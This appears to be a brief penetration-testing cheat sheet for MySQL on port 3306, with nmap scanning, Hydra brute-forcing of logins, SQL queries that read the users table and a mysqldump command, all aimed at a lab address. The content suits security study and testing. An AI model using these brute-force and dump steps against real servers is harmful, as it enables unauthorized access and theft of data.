MySQL - 3306

MySQL is an open-source relational database management system that uses Structured Query Language (SQL) for accessing and managing data. It is commonly used in web applications and supports multi-user access to databases while maintaining performance and reliability.

Default port: 3306

Enumeration

# Scan and check service
sudo nmap -sV -p 3306 --script=mysql-info 10.10.10.10

# Check for anonymous login
mysql -u root -h 10.10.10.10 -p

# Bruteforce login (Hydra)
hydra -L users.txt -P passwords.txt mysql://10.10.10.10

Exploitation

# After gaining access:
SHOW DATABASES;
USE dbname;
SHOW TABLES;
SELECT * FROM users;

# Dump database using mysqldump (if creds known)
mysqldump -u root -p -h 10.10.10.10 dbname > dump.sql

Enumeration​

Exploitation​

Enumeration

Exploitation